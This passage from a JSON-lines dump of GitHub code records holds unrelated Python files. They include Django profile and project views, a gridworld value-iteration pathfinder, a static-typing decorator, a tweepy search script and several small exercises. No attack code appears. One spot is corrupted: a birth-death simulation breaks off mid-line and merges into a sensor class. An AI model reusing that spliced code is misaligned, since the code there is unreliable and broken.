Profile.objects.filter(user_id=current_user.id).first()\n    project = Project.objects.filter(user_id=current_user.id).all()\n\n    return render(request, \"profile.html\", {\"profile\": profile, \"screenshots\": project})\n\n\n@login_required(login_url=\"/accounts/login/\")\ndef update_profile(request):\n    if request.method == \"POST\":\n        current_user = request.user\n        first_name = request.POST[\"first_name\"]\n        last_name = request.POST[\"last_name\"]\n        username = request.POST[\"username\"]\n        email = request.POST[\"email\"]\n\n        bio = request.POST[\"bio\"]\n        contact = request.POST[\"contact\"]\n\n        profile_image = request.FILES[\"profile_pic\"]\n        profile_image = cloudinary.uploader.upload(profile_image)\n        profile_url = profile_image[\"url\"]\n\n        user = User.objects.get(id=current_user.id)\n        if Profile.objects.filter(user_id=current_user.id).exists():\n            profile = Profile.objects.get(user_id=current_user.id)\n            profile.profile_pic = profile_url\n            profile.bio = bio\n            profile.contact = contact\n            profile.save()\n        else:\n            profile = Profile(\n                user_id=current_user.id,\n                profile_pic=profile_url,\n                bio=bio,\n                contact=contact,\n            )\n            profile.save_profile()\n\n        user.first_name = first_name\n        user.last_name = last_name\n        user.username = username\n        user.email = email\n\n        user.save()\n\n        return redirect(\"/profile\", {\"success\": \"Profile update successful\"})\n    else:\n        return render(request, \"profile.html\", {\"danger\": \"Profile update unsuccessful\"})\n\n#project views \ndef project_details(request, project_id):\n    project = Project.objects.get(id=project_id)\n    rating = Vote.objects.filter(project=project)\n    return render(request, \"project.html\", {\"project\": project, \"rating\": rating})\n\n@login_required(login_url=\"/accounts/login/\")\ndef save_project(request):\n    if request.method == \"POST\":\n        current_user = request.user\n        title = request.POST[\"title\"]\n        location = request.POST[\"location\"]\n        description = request.POST[\"description\"]\n        url = request.POST[\"url\"]\n        screenshot = request.FILES[\"image\"]\n        screenshot = cloudinary.uploader.upload(screenshot)\n        image_url = screenshot[\"url\"]\n\n        project = Project(\n            user_id=current_user.id,\n            title=title,\n            location=location,\n            
description=description,\n            url=url,\n            screenshot=image_url,\n        )\n        project.save_project()\n\n        return redirect(\"/profile\", {\"success\": \"Project Saved Successfully\"})\n    else:\n        return render(request, \"profile.html\", {\"danger\": \"Project Save Failed\"})\n\n\n#rate projects\n@login_required(login_url='/accounts/login/')\ndef rate_project(request, id):\n    if request.method == \"POST\":\n        project = Project.objects.get(id=id)\n        current_user = request.user\n        design_rate=request.POST[\"design\"]\n        usability_rate=request.POST[\"usability\"]\n        content_rate=request.POST[\"content\"]\n\n        Vote.objects.create(\n            project=project,\n            user=current_user,\n            design_rate=design_rate,\n            usability_rate=usability_rate,\n            content_rate=content_rate,\n            average_rate=round((float(design_rate)+float(usability_rate)+float(content_rate))/3,2),\n        )\n        average_rating= (int(design_rate)+int(usability_rate)+int(content_rate))/3\n        project.rate=average_rating\n        project.update_project()\n\n        return render(request, \"project.html\", {\"success\": \"Project Rated!\", \"project\": project, \"rating\": Vote.objects.filter(project=project)})\n    else:\n        project = Project.objects.get(id=id)\n        return render(request, \"project.html\", {\"danger\": \"Rating Failed\", \"project\": project})\n\n\n# search for project\ndef search_project_title(request):\n    if 'search_term' in request.GET and request.GET[\"search_term\"]:\n        search_term = request.GET.get(\"search_term\")\n        searched_projects = Project.objects.filter(title=search_term)\n        message = f\"Search For: {search_term}\"\n\n        return render(request, \"search.html\", {\"message\": message, \"projects\": searched_projects})\n    else:\n        message = \"No term searched, please input search term\"\n        return render(request, \"search.html\", {\"message\": message})\n\n\n# delete project\n@login_required(login_url=\"/accounts/login/\")\ndef delete_project(request, id):\n    project = Project.objects.get(id=id)\n    project.delete_project()\n    return redirect(\"/profile\", {\"success\": \"Project Deleted\"})\n\n\n    \n\n#API Views\nclass ProfileList(APIView): \n    permission_classes = (IsAdminOrReadOnly,)\n    def get(self, request, format=None):\n        all_profiles = Profile.objects.all()\n        serializers = ProfileSerializer(all_profiles, many=True)\n        return Response(serializers.data)\n\n\nclass ProjectList(APIView): \n    permission_classes = (IsAdminOrReadOnly,)\n    def get(self, request, format=None):\n        all_projects = Project.objects.all()\n        serializers = ProjectSerializer(all_projects, many=True)\n        return Response(serializers.data)\n","repo_name":"oyesa/DjangoAwwards","sub_path":"awwardsapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"21249664338","text":"from fractions import Fraction\r\n# Python can handle fractions with the Fraction class; Fraction(i, j) is the reduced fraction i/j\r\nn = int(input())# the input number\r\nfraction_set = set()\r\nfor i in range(n+1):\r\n    for j in range(1, n+1):\r\n        if i<=j:\r\n            fraction_set.add(Fraction(i, j))\r\n# use a set to remove duplicate elements\r\nfraction_list = list(fraction_set)\r\nfraction_list.sort()\r\nfor num in fraction_list:\r\n    print(num.numerator, end='')\r\n    print('/', end='')\r\n    print(num.denominator)","repo_name":"Yizhang-Zhu/2020-Summer-Semester","sub_path":"Code/顺序的分数.py","file_name":"顺序的分数.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"21138849835","text":"from django.shortcuts import render\nfrom django.http import 
HttpResponse\n\ndef emp_data_view(request):\n    emp_data = {\n  'eno':5000,\n  'ename':'rao',\n  'esal':50000,\n  'eaddr':'bglr'\n\n\n}\n    response = f'Emp No : {emp_data[\"eno\"]}\\nEmp name:{emp_data[\"ename\"]}\\nEmp sal: {emp_data[\"esal\"]}\\nEmp addr:{emp_data[\"eaddr\"]}'\n    return HttpResponse(response)# should double quote \"eno\"\n\nimport json\ndef emp_data_json_view(request):\n    emp_data = {\n        'eno': 5000,\n        'ename': 'rao',\n        'esal': 50000,\n        'eaddr': 'bglr'\n\n    }\n\n    json_data = json.dumps(emp_data)\n    return HttpResponse(json_data,content_type='application/json') #\n\nfrom django.http import JsonResponse\nfrom django.views.generic import View\ndef emp_data_json_view2(request):\n    emp_data = {\n        'eno': 5000,\n        'ename': 'rao',\n        'esal': 50000,\n        'eaddr': 'bglr'\n\n    }\n\n\n    return JsonResponse(emp_data,content_type='application/json')\n\nfrom testing.mixins import HttpResponseMixins\nclass JsonCBV(HttpResponseMixins,View):\n    def get(self,request,*args,**kwargs):\n        json_data = json.dumps({'message':'this is get method' })\n        return self.render_to_HttpRespnose(json_data)\n\n    def post(self,request,*args,**kwargs):\n        json_data = json.dumps({'message':'this is post method' })\n        return self.render_to_HttpRespnose(json_data)\n\n    def put(self,request,*args,**kwargs):\n        json_data = json.dumps({'message':'this is put method' })\n        return self.render_to_HttpRespnose(json_data)\n\n    def delete(self,request,*args,**kwargs):\n        json_data = json.dumps({'message':'this is delete method' })\n        return self.render_to_HttpRespnose(json_data)","repo_name":"madhavareddy414/djangopractice","sub_path":"restapi_apps/withoutrestot/testing/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"4729752873","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSolution to Project Euler problem X\n\nAuthor: Jaime Liew\nhttps://github.com/jaimeliew1/Project_Euler_Solutions\n\"\"\"\n\ndef PentNum(n):\n    # returns the nth pentagonal number\n    return n*(3*n-1)//2\n\n\n\ndef pentPairs():\n    pentNums = list(PentNum(x) for x in range(1000, 3000))\n    L = len(pentNums)\n    for i in range(1, L):\n        for j in range(i):\n            yield (pentNums[i], pentNums[j])\n\n\n\ndef run():\n    pentNums = list(PentNum(x) for x in range(1000, 3000))\n    out = []\n    for a, b in pentPairs():\n        if (a + b in pentNums) and (a - b in pentNums):\n            out.append(a - b)\n    return out[0]\n\n\nif __name__ == \"__main__\":\n\n\n    print(run())\n\n","repo_name":"jaimeliew1/Project_Euler_Solutions","sub_path":"Python/044.py","file_name":"044.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"17141474817","text":"from flask import Flask\r\n\r\napp = Flask(__name__)\r\nf = open(\"text.txt\",\"r\") #change to rev img report text file\r\noutput = f.read()\r\n\r\n\r\n@app.route(\"/output\")\r\ndef members():\r\n    return {\"output\": [output]}\r\n\r\nif __name__ == \"__main__\":\r\n    app.run(debug=True)\r\n\r\nf.close()","repo_name":"wishdar/segp","sub_path":"flask-server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"28444881721","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom matplotlib import animation\nfrom matplotlib.collections import PatchCollection\n\n\nclass Visualizer:\n\n    def __init__(self, array_polygons, x_lim, y_lim, title):\n        self.__array_polygons = array_polygons\n        self.__x_lim = x_lim\n        self.__y_lim = y_lim\n        self.__title = title\n        self.__fig = plt.figure(figsize=(10, 10))\n        self.__ax = plt.subplot()\n\n    def plot_polygons(self):\n        colors = 100 * 
np.random.rand(len(self.__array_polygons))\n p = PatchCollection(self.__array_polygons, alpha=.5)\n p.set_array(np.array(colors))\n p.set_edgecolor([0, 0, 0])\n self.__ax.set_xlim((0, self.__x_lim))\n self.__ax.set_ylim((0, self.__y_lim))\n self.__ax.set_title(self.__title)\n self.__ax.add_collection(p)\n plt.show()\n\n def init(self):\n self.__ax.set_title(self.__title)\n plt.ylim(0, self.__y_lim)\n plt.xlim(0, self.__x_lim)\n\n def update(self, frame):\n color = np.random.rand(1, 3)\n p = PatchCollection([self.__array_polygons[frame]], alpha=.5)\n p.set_color(color)\n p.set_edgecolor([0, 0, 0])\n self.__ax.add_collection(p)\n return\n\n def plot_animation(self):\n ani = animation.FuncAnimation(self.__fig,\n self.update,\n interval=500,\n frames=len(self.__array_polygons),\n init_func=self.init,\n repeat=False)\n plt.show()\n return ani\n","repo_name":"WesleyHBNunes/polygons-visualizer","sub_path":"Visualizer.py","file_name":"Visualizer.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"40549930182","text":"from config import *\nimport tweepy\nimport json\nfrom os.path import join as pjoin\nimport pandas as pd\ndata_path = \"data\"\n# authentication\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_token_secret)\n\napi = tweepy.API(auth)\nmax_tweets = 5\nquery = 'jenasena'\nsearched_tweets = [\n status._json for status in tweepy.Cursor(\n api.search,\n q=query).items(max_tweets)]\njson_strings = [json.dumps(json_obj) for json_obj in searched_tweets]\n\nwith open(pjoin(data_path,'sample.json'),'w') as f:\n f.write(json_strings[0])\n\n","repo_name":"cerofrais/Twittersenti","sub_path":"get_twitter_date.py","file_name":"get_twitter_date.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"24836079940","text":"import itertools\nimport numpy as np\nfrom typing import Dict, Tuple\n\n\ndef read_map(filename):\n map = []\n\n with open(filename) as file:\n text = file.read()\n lines = text.splitlines()\n\n for line in lines:\n line = [int(cell) for cell in line.split()]\n map.append(line)\n\n return map\n\n\n\n\nclass Cargo:\n\n def __init__(self, map) -> None:\n self.map = map\n self.shape = self.get_cargo_shape()\n\n \n def get_right_lower_corner(self, cargo):\n lower = 0\n right = 0\n\n for row, col in cargo:\n lower = max(lower, row)\n right = max(right, col)\n \n return lower, right\n\n\n def get_cargo_shape(self):\n '''Returns list of tupples with shift of cargo's cells\n with respect to right lower corner (if it even does not exist).\n '''\n cargo = []\n\n for row in range(len(self.map)):\n for col in range(len(self.map[0])):\n if self.map[row][col] == 2:\n cargo.append((row, col))\n\n self.corner_row, self.corner_col = self.get_right_lower_corner(cargo)\n\n for part_idx in range(len(cargo)):\n row, col = cargo[part_idx]\n cargo[part_idx] = (row - self.corner_row, col - self.corner_col)\n \n return cargo\n\n \n def get_cargo_coordinates(self, corner_row, corner_col):\n cargo_coordinates = []\n\n for row_shift, col_shift in self.shape:\n cargo_coordinates.append((corner_row + row_shift, corner_col + col_shift))\n\n return cargo_coordinates\n\n \n def is_valid_position(self, corner_row, corner_col):\n\n cargo_coordinates = self.get_cargo_coordinates(corner_row, corner_col)\n\n def is_valid_cell(row, col):\n n_rows = len(self.map)\n n_cols 
= len(self.map[0])\n\n if row < 0:\n return False\n if row >= n_rows:\n return False\n if col < 0:\n return False\n if col >= n_cols:\n return False\n\n if self.map[row][col] == 1:\n return False\n\n return True\n\n check = [is_valid_cell(row, col) for row, col in cargo_coordinates]\n is_valid = all(check)\n\n return is_valid\n\n\n\n\nclass GridWorld:\n\n class Cell:\n\n def __init__(self, row, col, world, default_reward=-1):\n\n self.row = row\n self.col = col\n self.env = world\n self.default_reward = default_reward\n\n self.actions_to = []\n\n def compute_value(self, gamma=0.9):\n if len(self.actions_to) == 0:\n return self.env.value_function[str(self)]\n qs = []\n for place in self.actions_to:\n action_reward = self.env.rewards.get((str(self), place), self.default_reward)\n next_v = gamma * self.env.value_function[place]\n qs.append(action_reward + next_v)\n return max(qs)\n\n def __str__(self):\n return f\"{self.row}_{self.col}\"\n\n def __repr__(self):\n return str(self)\n\n\n def __init__(self,\n map: list,\n rewards: Dict[Tuple[str, str], float] = {}, \n gamma: float = 0.9,\n default_reward: float = -1):\n \n self.map = map\n self.n_rows = len(map)\n self.n_cols = len(map[0])\n \n coords = itertools.product(range(self.n_rows), range(self.n_cols))\n \n self.state_list = [self.Cell(row, col, self, default_reward) for row, col in coords]\n self.state_dict = {str(cell): cell for cell in self.state_list}\n self.value_function = {str(cell): 0 for cell in self.state_list}\n self.rewards = rewards\n self.gamma = gamma\n\n\n def update_values(self):\n new_value_function = self.value_function.copy()\n \n for cell in self.state_list:\n new_value_function[str(cell)] = cell.compute_value(self.gamma)\n \n self.value_function = new_value_function\n\n\n def visualize(self):\n array = np.zeros((self.n_rows, self.n_cols))\n for col in range(self.n_cols):\n for row in range(self.n_rows):\n array[row, col] = self.value_function[f'{row}_{col}']\n\n print(array)\n\n def get_state_value(self):\n array = np.zeros((self.n_rows, self.n_cols))\n for col in range(self.n_cols):\n for row in range(self.n_rows):\n array[row, col] = self.value_function[f'{row}_{col}']\n\n return array\n\n\n\n\ndef get_state_value_of_map(map):\n cargo = Cargo(map)\n world = GridWorld(map)\n\n for row in range(world.n_rows):\n for col in range(world.n_cols):\n\n if cargo.is_valid_position(row, col) == False:\n world.value_function[f'{row}_{col}'] = -np.inf\n continue\n\n moves = [(1, 0), (-1, 0), (0, -1), (0, 1)]\n\n for row_shift, col_shift in moves:\n new_row = row + row_shift\n new_col = col + col_shift\n\n if cargo.is_valid_position(new_row, new_col):\n world.state_dict[f'{row}_{col}'].actions_to.append(f'{new_row}_{new_col}')\n\n world.state_dict[f'{world.n_rows - 1}_{world.n_cols - 1}'].actions_to = []\n\n for _ in range(100):\n world.update_values()\n \n return world.get_state_value()\n\n\n\n\nclass StateValueMap:\n\n def __init__(self, state_value_map):\n self.map = state_value_map\n self.n_rows = len(state_value_map)\n self.n_cols = len(state_value_map[0])\n\n def is_valid_position(self, row, col):\n if row < 0:\n return False\n if row >= self.n_rows:\n return False\n if col < 0:\n return False\n if col >= self.n_cols:\n return False\n\n if self.map[row][col] == -np.inf:\n return False\n\n return True\n\n def get_possible_moves(self, row, col):\n positions = []\n\n moves = [(1, 0), (-1, 0), (0, -1), (0, 1)]\n\n for row_shift, col_shift in moves:\n new_row = row + row_shift\n new_col = col + col_shift\n\n if 
self.is_valid_position(new_row, new_col):\n positions.append((new_row, new_col))\n\n return positions\n\n def get_best_moves(self, row, col):\n positions = self.get_possible_moves(row, col)\n maximum = -np.inf\n\n for row, col in positions:\n maximum = max(maximum, self.map[row][col])\n\n moves = []\n for row, col in positions:\n if self.map[row][col] == maximum:\n moves.append((row, col))\n\n return moves\n\n\n\n\ndef get_path_array(map):\n\n state_map = StateValueMap(get_state_value_of_map(map))\n cargo = Cargo(map)\n\n came_from = [len(map[0]) * [None] for _ in range(len(map))]\n\n queue = [(cargo.corner_row, cargo.corner_col)]\n\n while len(queue) != 0:\n cell = queue.pop(0)\n row, col = cell\n\n moves = state_map.get_best_moves(row, col)\n\n for move in moves: \n row, col = move\n if came_from[row][col] == None:\n came_from[row][col] = cell\n queue.append(move)\n\n came_from[cargo.corner_row][cargo.corner_col] = cargo.corner_row, cargo.corner_col\n\n return came_from\n\n\n\n\ndef get_path(map):\n came_from = get_path_array(map)\n\n if came_from[-1][-1] == None:\n return []\n\n path = [came_from[-1][-1]]\n \n row, col = came_from[-1][-1]\n\n while came_from[row][col] != (row, col):\n row, col = came_from[row][col]\n path.append((row, col))\n\n path.reverse()\n path.append((len(map) - 1, len(map[0]) - 1))\n\n return path\n\n\n\n\ndef get_steps(map):\n path = get_path(map)\n\n if len(path) == 0:\n return 'No path'\n\n steps = ''\n\n for i in range(len(path) - 1):\n row_from, col_from = path[i]\n row_to, col_to = path[i + 1]\n\n if (row_to - row_from) == -1:\n steps += 'U '\n\n elif (row_to - row_from) == 1:\n steps += 'D '\n\n elif (col_to - col_from) == -1:\n steps += 'L '\n \n elif (col_to - col_from) == 1:\n steps += 'R '\n\n return steps\n\n\n\n\ndef find_path(path_to_infile, path_to_out_file):\n map = read_map(path_to_infile)\n path = get_steps(map)\n\n with open(path_to_out_file, 'w') as file:\n file.write(path)\n\n\n\n# for i in range(6):\n# find_path(f'./inputs/input{i}.txt', f'./outputs/output{i}.txt')","repo_name":"KKroliKK/Reinforcement-Learning","sub_path":"Assignment1/Andrey_Vagin.py","file_name":"Andrey_Vagin.py","file_ext":"py","file_size_in_byte":8540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"24566054968","text":"import collections\nimport functools\nimport types\n\n_error_msg_dict = {\n \"_function\": \"object_type object_name's parameter 'param_name',\",\n \"_attribute\": \"object_type 'param_name' of object object_name,\",\n \"generic\": \" is not the same type as annotated: \\nType given: p_type, type(s) expected: param_types\",\n \"dict_keys\": \" dict container's keys are not all of the type(s): param_types\",\n \"dict_values\": \" dict container's values are not all of the type(s): param_types\",\n \"container\": \" p_type container is not all of the type(s): param_types\",\n}\n\n_type_tuple = collections.namedtuple(\"type_container\",\n [\"object_name\", \"object_type\", \"param_name\", \"param_types\", \"param_value\"])\n\n\ndef _fmt_msg(msg, tc, override=None):\n if \"param_type\" in msg:\n msg = msg.replace(\"p_type\", str(type(tc.param_value)))\n\n if not override:\n override = {}\n\n for (attr, value) in tc._asdict().items(): # this was the quickest/simplest way I found to convert this into a dict\n if attr not in override:\n if attr != \"param_types\":\n msg = msg.replace(attr, str(value))\n else:\n msg = msg.replace(attr, str(value.original_types))\n else:\n msg = msg.replace(attr, 
str(tuple(override[attr])))\n return msg\n\n\ndef _error_msg(err_type, tc, override=None):\n prefix = _error_msg_dict[\"_function\"] if tc.object_type in [\"function\", \"method\"] else _error_msg_dict[\"_attribute\"]\n err = prefix + _error_msg_dict[err_type]\n\n return _fmt_msg(err, tc, override)\n\n\nclass _TypeWrapper:\n def __init__(self, _type):\n\n self.original_type = _type\n\n if issubclass(type(_type), types.UnionType): # if the type given is a union type.\n self.base_type = None\n self.subscript_types = _type.__args__\n\n elif isinstance(_type, types.GenericAlias): # if the type given is a generic alias type.\n\n self.base_type = _type.__origin__\n self.subscript_types = _type.__args__\n\n if issubclass(self.base_type, dict) and len(self.subscript_types) == 2:\n # handling dict[key_type, value_type] types.\n self.subscript_types = tuple((_TypeWrapper(i),) for i in self.subscript_types)\n\n elif isinstance(*self.subscript_types, types.UnionType):\n self.subscript_types = self.subscript_types[0].__args__\n else:\n self.base_type = _type\n self.subscript_types = None\n # print(f\"BASE: {self.base_type}, SUBSCRP: {self.subscript_types}\")\n\n def __repr__(self):\n return f\"_TypeWrapper(base: {self.base_type}, subscript: {self.subscript_types})\"\n\n\nclass _TypeContainer:\n def __init__(self, _type):\n\n self.types: dict[set] = dict()\n self.original_types = _type\n\n for type_ in self._unpack_type(_type):\n if type_.base_type not in self.types:\n self.types[type_.base_type] = {type_}\n else:\n self.types[type_.base_type].add(type_)\n\n def __repr__(self):\n return f\"_TypeContainer({self.types})\"\n\n @staticmethod\n def _unpack_type(_type):\n if isinstance(_type, types.UnionType):\n return tuple(_TypeWrapper(i) for i in _type.__args__)\n else:\n return _TypeWrapper(_type),\n\n\ndef _validate_type(tc):\n if not issubclass(type(tc.param_value), # if the param value type not in the param_types var.\n tuple(tc.param_types.types)):\n raise TypeError(_error_msg(\"generic\", tc))\n\n err = _validate_type_wrapper(tc)\n if err:\n raise TypeError(err)\n\n\ndef _validate_type_wrapper(tc):\n if type(tc.param_value) not in tc.param_types.types:\n return # meaning the value is a class instance, since it's subclassed from object and is not in the types set.\n\n for type_ in tc.param_types.types[type(tc.param_value)]:\n if not type_.subscript_types: # if not a generic alias, regardless if it's a container,\n # return since that's a type match.\n return\n else:\n if issubclass(type_.base_type, dict) and len(type_.subscript_types) == 2:\n if isinstance(tc.param_value, dict):\n # if type to be checked is dict, the subscript params is 2 and the type of the param value is dict.\n # Checking dict[key_type, value_type]\n\n ga_unpacked_0 = type_.subscript_types[0][0].subscript_types if \\\n type_.subscript_types[0][\n 0].subscript_types else (type_.subscript_types[0][0].base_type,)\n ga_unpacked_1 = type_.subscript_types[1][0].subscript_types if \\\n type_.subscript_types[1][\n 0].subscript_types else (type_.subscript_types[1][0].base_type,)\n\n # this is the spawn of lucifer.\n\n if not all((True if type(i) in ga_unpacked_0 else False for i in tc.param_value)):\n return _error_msg(\"dict_keys\", tc, override={\"param_types\": [*ga_unpacked_0]})\n if not all((True if type(i) in ga_unpacked_1 else False for i in tc.param_value.values())):\n return _error_msg(\"dict_values\", tc, override={\"param_types\": [*ga_unpacked_1]})\n\n return # if the dict is a dict, and has all the correct subscripted types in 
key and values.\n\n elif not all((True if type(i) in type_.subscript_types else False for i in tc.param_value)):\n # Check if the generic alias container's values are all the specified type(s).\n return _error_msg(\"container\", tc, override={\"param_types\": type_.subscript_types})\n\n\ndef static_type(f):\n \"\"\"\n Decorator for static-typing function parameters. Annotate the type each parameter is meant to be, and if any\n given parameter isn't of the expected type, it will raise a TypeError.\n\n Supports normal types, union types, and container subscript types, and methods. Does not support nested generic\n aliases within generic aliases (Recursion needed, but that might make this a bit slow).\n \"\"\"\n\n @functools.wraps(f) # this helps with the identity of the passed function f.\n def wrapper(*args, **kwargs):\n\n obj_type = \"method\" if (args and hasattr(args[0], f.__name__)) \\\n else \"function\" if isinstance(f, types.FunctionType) else \"attribute\"\n\n # Checking if a method of a class, don't include \"self\"/object ref in the\n # type checking. Have to resort to this jank because inspect.ismethod fails because it doesn't have a\n # __self__ attribute for some reason when passed into the decorator. Something to do with this being\n # before __init__ is called?\n\n _is_static = True if obj_type == \"method\" and issubclass(f.__class__, staticmethod) else False\n\n if not _is_static: # checking whether a decorator has a __func__ arg.\n param_names = f.__code__.co_varnames[:f.__code__.co_argcount]\n else:\n param_names = f.__func__.__code__.co_varnames[:f.__func__.__code__.co_argcount]\n args = args[1:] # exclude first arg, i.e. self. THIS WILL BREAK IF YOU TYPEHINT THE SELF VAR.\n\n concat_args = args + tuple(kwargs.values())\n annotated_args = tuple( # if a param has a typehint: unpack it, else if it doesn't: unpack with an object type.\n (param_name, _TypeContainer(f.__annotations__[param_name])) if param_name in f.__annotations__ else (\n param_name, _TypeContainer(object)) for param_name in param_names)\n\n for param_args, param_value in zip(annotated_args, concat_args):\n param_name, param_types = param_args\n _validate_type(_type_tuple(f.__name__, obj_type, param_name, param_types, param_value))\n\n retval = f(*args, **kwargs)\n\n if \"return\" in f.__annotations__:\n param_types = _TypeContainer(f.__annotations__[\"return\"])\n _validate_type(_type_tuple(f.__name__, obj_type, \"return\", param_types, retval))\n\n return retval\n\n return wrapper\n\n\ndef _is_user_method(attr, value):\n if \"__\" not in attr and getattr(value, 'decorate', True):\n if isinstance(value, staticmethod) and isinstance(value.__func__, types.FunctionType):\n return True\n return isinstance(value, types.FunctionType)\n return False\n\n\ndef dont_static_type(f): # decorator to exclude static-typing methods of a class inherited from StaticBase.\n f.decorate = False\n return f\n\n\nclass StaticBase:\n \"\"\"\n To use, annotate here, like:\n x: int\n y: str\n\n ...then add these attributes in the __init__ method to make them static-typed.\n THIS WILL ONLY STATIC-TYPE THE ATTRIBUTES WHEN BEING ASSIGNED TO (i.e. 
_setattr_).\n IT WILL NOT PROTECT AN ATTRIBUTE WHEN MUTATING ITSELF.\n \"\"\"\n\n def __new__(cls, *args, **kwargs):\n for attr, value in cls.__dict__.items():\n if _is_user_method(attr, value):\n setattr(cls, attr, static_type(value))\n return super(StaticBase, cls).__new__(cls)\n\n def __setattr__(self, attr, value):\n if attr in self.__annotations__:\n param_types = _TypeContainer(self.__annotations__[attr])\n _validate_type(_type_tuple(self, \"attribute\", attr, param_types, value))\n self.__dict__[attr] = value\n","repo_name":"Nedoko-maki/static_typing","sub_path":"static_typing.py","file_name":"static_typing.py","file_ext":"py","file_size_in_byte":9443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"22820573147","text":"from selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium import webdriver\nimport math, time\n\ndef calc(x):\n return str(math.log(abs(12*math.sin(int(x)))))\n\ntry:\n browser = webdriver.Chrome()\n browser.implicitly_wait(5)\n\n browser.get(\"http://suninjuly.github.io/explicit_wait2.html\")\n\n WebDriverWait(browser, 12).until(EC.text_to_be_present_in_element((By.ID, \"price\"), \"$100\"))\n browser.find_element_by_class_name(\"btn-primary\").click() \n\t\n y = str(calc(browser.find_element_by_css_selector(\"#input_value\").text))\n browser.find_element_by_css_selector(\"#answer\").send_keys(y)\n browser.find_element_by_css_selector(\"#solve\").click()\n\n print(browser.switch_to.alert.text.split(': ')[-1])\t\n \nfinally:\n time.sleep(5)\n browser.switch_to.alert.accept()\n browser.quit()","repo_name":"maria-azb/auto-tests","sub_path":"lesson_2_4_step_8.py","file_name":"lesson_2_4_step_8.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"72526521119","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nplt.close('all')\r\n\r\nBsyn= float(input('Enter rate of synthesis: '))\r\nk=float(input('Enter clearance rate constant: '))\r\nT=float(input('Enter total time: '))\r\nlini=float(input('Enter initial number of molecules: '))\r\n\r\ndef birth_death_process(lini, T, k, Bsyn):\r\n ts=[0]\r\n Ls=[lini]\r\n while(ts[-1] str:\n \"\"\"\n This property provides the sensor message's main body\n :return: Updated json readout for the sensor.\n \"\"\"\n out = self.__dict__\n out.pop('signal')\n out.update({'value': str(self.signal.value)})\n out.update({'posix_timestamp': datetime.now().timestamp()})\n out = {'readout': out}\n return json.dumps(out)\n\n @property\n def send_readout_fn(self) -> callable:\n \"\"\" Returns the stored logger callback function \"\"\"\n return self._readout_callback_fn\n\n @send_readout_fn.setter\n def send_readout_fn(self, fn: Union[Callable[[...], None] | None]) -> None:\n \"\"\" Stores de callback function when the sensor is registered \"\"\"\n self._readout_callback_fn = fn\n\n def send_readout(self) -> None:\n \"\"\"\n Sends sensor readout to the logger module via the provided callback\n function\n \"\"\"\n self.send_readout_fn(self.readout)\n\n\n","repo_name":"GSentientWolf/multithreaded","sub_path":"sensors/base_sensor.py","file_name":"base_sensor.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"4666739747","text":"class Solution:\n def 
addToArrayForm(self, num: List[int], k: int) -> List[int]:\n        res = []\n        n, carry, total = len(num), 0, 0\n        for i in range(n - 1, -1, -1):\n            total = num[i] + carry + k % 10\n            res.append(total % 10)\n            carry = total // 10\n            k //= 10\n        k += carry\n        while k > 0:\n            res.append(k % 10)\n            k //= 10\n        return res[::-1]","repo_name":"yiiilonggg/LeetCode","sub_path":"989. Add to Array-Form of Integer/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"29569812738","text":"from IOTPSlaveMessage import IOTPSlaveMessage\nfrom IOTPTransactionData import IOTPTransactionData, _LOC_MSG_BODY\n\n_author_ = \"int_soumen\"\n_date_ = \"12-08-2018\"\n\n_LOC_NO_OPERATION = _LOC_MSG_BODY\n_LOC_OPERAND_TYPE = 10\n_LOC_OPERAND_ID = 11\n_LOC_OPERAND_INSTRUCTION = 12\n_LOC_NEXT_OPERAND_INFO = 16\n\n_END_NO_OPERATION = _LOC_OPERAND_TYPE\n\n_LEN_OPERAND_TYPE = 1\n_LEN_OPERAND_ID = 1\n_LEN_OPERAND_INSTRUCTION = 4\n\n_MAX_NO_OPERATION = 8\n\n\nclass IOTPTransactionTypeCommand:\n\n    def __init__(self, iotp_trans_data_obj):\n        if not isinstance(iotp_trans_data_obj, IOTPTransactionData):\n            raise Exception(\"First argument should be an instance of IOTPTransactionData\")\n        self.__raw_server_data = iotp_trans_data_obj.get_raw_trans_data()\n        self.__no_opr = 0\n        self.__operation_info = []\n        self.__opr_ctr = -1\n        self.__parse_data()\n\n    def __parse_data(self):\n        # parse number of operation to perform\n        self.__no_opr = int(self.__raw_server_data[\n                            _LOC_NO_OPERATION:\n                            _END_NO_OPERATION\n                            ],\n                            16)\n        if self.__no_opr > _MAX_NO_OPERATION:\n            raise Exception(IOTPSlaveMessage.ResponseType.StatusCode.INVALID_REQUEST, \"Maximum 8 operations are \"\n                                                      